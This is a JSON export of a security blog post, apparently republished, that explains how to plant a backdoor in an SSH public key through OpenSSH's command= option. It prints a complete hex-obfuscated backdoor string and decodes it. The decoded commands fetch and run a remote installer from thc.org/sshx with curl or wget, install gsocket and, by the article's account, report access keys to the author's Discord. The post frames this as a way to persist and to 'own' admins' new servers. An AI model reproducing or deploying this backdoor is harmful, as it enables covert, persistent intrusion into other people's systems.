{"id":52045,"date":"2023-05-24T14:42:48","date_gmt":"2023-05-24T14:42:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/34653\/Infecting-SSH-Public-Keys-With-Backdoors.html"},"modified":"2023-05-24T14:42:48","modified_gmt":"2023-05-24T14:42:48","slug":"infecting-ssh-public-keys-with-backdoors","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/","title":{"rendered":"Infecting SSH Public Keys With Backdoors"},"content":{"rendered":"<div><img decoding=\"async\" src=\"https:\/\/hashnode.com\/utility\/r?url=https%3A%2F%2Fcdn.hashnode.com%2Fres%2Fhashnode%2Fimage%2Fupload%2Fv1684925495719%2F408763a9-064a-439b-9d2e-1a4420c1482a.jpeg%3Fw%3D1200%26auto%3Dcompress%2Cformat%26format%3Dwebp%26fm%3Dpng\" class=\"ff-og-image-inserted\"><\/div>\n<p>In this article, you will learn how to add a backdoor to the SSH Public Key. The backdoor will execute whenever the user logs in. The backdoor hides as an unreadable long hex-string inside <code>~\/.ssh\/authorized_keys<\/code> or <code>~\/.ssh\/id_*.pub.<\/code><\/p>\n<p>The source is available from <a target=\"_blank\" href=\"https:\/\/github.com\/hackerschoice\/ssh-key-backdoor\" rel=\"noopener\">GitHub<\/a>.<\/p>\n<h3 id=\"heading-tldr\">TL;DR<\/h3>\n<p>Simply prepend any SSH Public Key with the following <strong>backdoor-string<\/strong> &#8211; up until, but not including, the <code>ssh-ed25519 AAAAC3Nzblah...<\/code>):<\/p>\n<pre><code class=\"lang-typescript\">no-user-rc,no-X11-forwarding,command=<span class=\"hljs-string\">\"`###---POWERSHELL---`;eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);\"<\/span> ssh-ed25519 AAAAC3Nzblah....\n<\/code><\/pre>\n<p>Root is not needed.<\/p>\n<h3 id=\"heading-whats-the-purpose\">What&#8217;s the purpose<\/h3>\n<ol readability=\"0.5\">\n<li>\n<p>For the lulz.<\/p>\n<\/li>\n<li readability=\"-1\">\n<p>Re-starts your backdoor after the server reboots (similar to infecting <code>crontab<\/code> or <code>~\/.bashrc<\/code>).<\/p>\n<\/li>\n<li readability=\"-1\">\n<p>Spread laterally: Admins are known to copy their SSH Public Keys to new servers. Own them.<\/p>\n<\/li>\n<li readability=\"0\">\n<p>Cloud deployments often copy the Admin&#8217;s Public Key to new instances &#8211; and now they copy your backdoor inside as well.<\/p>\n<\/li>\n<\/ol>\n<h3 id=\"heading-the-nitty-gritty\">The nitty-gritty<\/h3>\n<p>OpenSSH has an <a target=\"_blank\" href=\"https:\/\/man.openbsd.org\/OpenBSD-current\/man8\/sshd.8#AUTHORIZED_KEYS_FILE_FORMAT\" rel=\"noopener\">unsung feature<\/a> to execute a command (instead of a Shell) when a user successfully logs in. This feature (for example) is used by AWS to tell the customer not to log in as root:<\/p>\n<pre><code class=\"lang-typescript\">no-port-forwarding,no-agent-forwarding,command=<span class=\"hljs-string\">\"echo 'Please login as the user \\\"ubuntu\\\" rather than the user \\\"root\\\".';echo;sleep 10;exit 142\"<\/span> ssh-ed25519 AAAA...\n<\/code><\/pre>\n<p>The trick is to use OpenSSH&#8217;s <code>command=<\/code> feature and silently start our backdoor <strong>and<\/strong> afterwards execute the user&#8217;s shell (with PTY) without the user noticing.<\/p>\n<h3 id=\"heading-the-details\">The Details<\/h3>\n<p>Let&#8217;s dissect the <strong>backdoor-string<\/strong>: The <code>no-user-rc,no-X11-forwarding<\/code> is a ruse to throw off any prying eyes. It can be omitted.<\/p>\n<p>The <code>command=<\/code> string is where the real magic happens. Here is a shorter version of a simplified <strong>backdoor-string<\/strong>:<\/p>\n<pre><code class=\"lang-typescript\">command=<span class=\"hljs-string\">\"`###---POWERSHELL---`;eval $(echo 6563686f2048656c6c6f204261636b646f6f72|xxd -r -ps)\"<\/span>\n<\/code><\/pre>\n<p>OpenSSH executes the entire string between the two quotes <code>\"<\/code>&#8230;<code>\"<\/code>.<\/p>\n<p>The <code>`###---POWERSHELL---`;<\/code> is a ruse as well. It does nothing.<\/p>\n<p>The next command <code>eval<\/code> executes the commands that are hidden inside the encoded hex string.<\/p>\n<p>Let&#8217;s decode the hex string to reveal the actual commands that are being executed:<\/p>\n<pre><code class=\"lang-bash\">$ <span class=\"hljs-built_in\">echo<\/span> 6563686f2048656c6c6f204261636b646f6f72 | xxd -r -ps\n<span class=\"hljs-built_in\">echo<\/span> Hello Backdoor\n<\/code><\/pre>\n<p>This simplified backdoor only prints &#8220;Hello Backdoor&#8221; on log-in and then terminates the SSH connection.<\/p>\n<p>Our <strong>backdoor-string<\/strong> is more complex and decoded here:<\/p>\n<pre><code class=\"lang-bash\">[[ $(<span class=\"hljs-built_in\">stat<\/span> -c%Y \/bin\/sh) != $(<span class=\"hljs-built_in\">stat<\/span> -c%Y .ssh) ]] &amp;&amp; { touch -r \/bin\/sh .ssh <span class=\"hljs-built_in\">export<\/span> KEY=<span class=\"hljs-string\">\"\"<\/span> bash -c <span class=\"hljs-string\">\"<span class=\"hljs-subst\">$(curl -fsSL thc.org\/sshx)<\/span>\"<\/span> || bash -c <span class=\"hljs-string\">\"<span class=\"hljs-subst\">$(wget --no-verbose -O- thc.org\/sshx)<\/span>\"<\/span> || <span class=\"hljs-built_in\">exit<\/span> 0\n} &gt;\/dev\/null 2&gt;\/dev\/null &amp;\n[[ -n <span class=\"hljs-variable\">$SSH_ORIGINAL_COMMAND<\/span> ]] &amp;&amp; <span class=\"hljs-built_in\">exec<\/span> <span class=\"hljs-variable\">$SSH_ORIGINAL_COMMAND<\/span>\n[[ -z <span class=\"hljs-variable\">$SHELL<\/span> ]] &amp;&amp; SHELL=\/bin\/bash\n[[ -f \/run\/motd.dynamic ]] &amp;&amp; cat \/run\/motd.dynamic\n[[ -f \/etc\/motd ]] &amp;&amp; cat \/etc\/motd\n<span class=\"hljs-built_in\">exec<\/span> -a -$(basename <span class=\"hljs-variable\">$SHELL<\/span>) <span class=\"hljs-variable\">$SHELL<\/span>\n<\/code><\/pre>\n<p>Firstly it uses a canary to make sure that the backdoor is only started <em>once<\/em> and not on every login: If <code>~\/.ssh<\/code> and <code>\/bin\/sh<\/code> have the same date then assume that the backdoor is already installed. Otherwise set them to the same date and execute the backdoor thereafter.<\/p>\n<p>The backdoor in this case is a backdoor-installer script pulled from <a target=\"_blank\" href=\"http:\/\/thc.org\/sshx\" rel=\"noopener\">thc.org\/sshx<\/a> and executed in memory. It starts as a background process to not slow down the user&#8217;s log-in. The installer-script installs <a target=\"_blank\" href=\"http:\/\/gsocket.io\/deploy\" rel=\"noopener\">gsocket<\/a> and if successful reports the access key and system metrics to our discord channel.<\/p>\n<p>Thereafter our <strong>backdoor-string<\/strong> checks if the user wanted to execute a command rather than a shell.<\/p>\n<p>The last three lines are when the user logs in to a shell &#8211; the normal case:<\/p>\n<ol readability=\"-1\">\n<li readability=\"-1\">\n<p>Set the SHELL variable if not set already.<\/p>\n<\/li>\n<li>\n<p>Simulate Linux&#8217;s motd.<\/p>\n<\/li>\n<li readability=\"-1\">\n<p>Execute the user&#8217;s shell.<\/p>\n<\/li>\n<\/ol>\n<p>Keep Hacking,<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/34653\/Infecting-SSH-Public-Keys-With-Backdoors.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":52046,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[277],"tags":[10528],"class_list":["post-52045","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity-blogs","tag-headlinehackerpasswordbackdoor"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Infecting SSH Public Keys With Backdoors 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Infecting SSH Public Keys With Backdoors 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-05-24T14:42:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hashnode.com\/utility\/r?url=https%3A%2F%2Fcdn.hashnode.com%2Fres%2Fhashnode%2Fimage%2Fupload%2Fv1684925495719%2F408763a9-064a-439b-9d2e-1a4420c1482a.jpeg%3Fw%3D1200%26auto%3Dcompress%2Cformat%26format%3Dwebp%26fm%3Dpng\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Infecting SSH Public Keys With Backdoors\",\"datePublished\":\"2023-05-24T14:42:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/\"},\"wordCount\":450,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/05\\\/infecting-ssh-public-keys-with-backdoors.jpg\",\"keywords\":[\"headline,hacker,password,backdoor\"],\"articleSection\":[\"CyberSecurity Blogs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/\",\"name\":\"Infecting SSH Public Keys With Backdoors 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/05\\\/infecting-ssh-public-keys-with-backdoors.jpg\",\"datePublished\":\"2023-05-24T14:42:48+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/05\\\/infecting-ssh-public-keys-with-backdoors.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/05\\\/infecting-ssh-public-keys-with-backdoors.jpg\",\"width\":1200,\"height\":600},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/infecting-ssh-public-keys-with-backdoors\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,hacker,password,backdoor\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlinehackerpasswordbackdoor\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Infecting SSH Public Keys With Backdoors\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Infecting SSH Public Keys With Backdoors 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/","og_locale":"en_US","og_type":"article","og_title":"Infecting SSH Public Keys With Backdoors 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-05-24T14:42:48+00:00","og_image":[{"url":"https:\/\/hashnode.com\/utility\/r?url=https%3A%2F%2Fcdn.hashnode.com%2Fres%2Fhashnode%2Fimage%2Fupload%2Fv1684925495719%2F408763a9-064a-439b-9d2e-1a4420c1482a.jpeg%3Fw%3D1200%26auto%3Dcompress%2Cformat%26format%3Dwebp%26fm%3Dpng","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Infecting SSH Public Keys With Backdoors","datePublished":"2023-05-24T14:42:48+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/"},"wordCount":450,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/05\/infecting-ssh-public-keys-with-backdoors.jpg","keywords":["headline,hacker,password,backdoor"],"articleSection":["CyberSecurity Blogs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/","url":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/","name":"Infecting SSH Public Keys With Backdoors 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/05\/infecting-ssh-public-keys-with-backdoors.jpg","datePublished":"2023-05-24T14:42:48+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/05\/infecting-ssh-public-keys-with-backdoors.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/05\/infecting-ssh-public-keys-with-backdoors.jpg","width":1200,"height":600},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/infecting-ssh-public-keys-with-backdoors\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,hacker,password,backdoor","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlinehackerpasswordbackdoor\/"},{"@type":"ListItem","position":3,"name":"Infecting SSH Public Keys With Backdoors"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52045","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=52045"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52045\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/52046"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=52045"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=52045"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=52045"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}